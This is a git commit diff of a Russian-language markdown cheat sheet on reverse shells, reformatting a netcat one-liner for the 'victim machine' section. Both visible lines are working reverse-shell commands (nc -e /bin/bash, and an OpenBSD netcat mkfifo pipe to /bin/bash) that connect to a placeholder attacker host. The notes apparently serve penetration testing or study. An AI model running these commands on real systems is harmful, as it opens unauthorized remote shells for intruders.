This commit is contained in:
root
2023-09-25 14:10:32 +03:00
parent 12c2b652f0
commit 500c76271b
12 changed files with 11 additions and 92 deletions

View File

@ -15,6 +15,5 @@ nc <attacker-ip> <port> -e /bin/bash
## Машина жертвы (OpenBSD Netcat)
```shell
mkfifo /tmp/rev; nc <attacker-ip> <port> < /tmp/rev \
| /bin/bash 2>&1 | tee /tmp/rev > /dev/null
mkfifo /tmp/rev; nc <attacker-ip> <port> < /tmp/rev | /bin/bash 2>&1 | tee /tmp/rev > /dev/null
```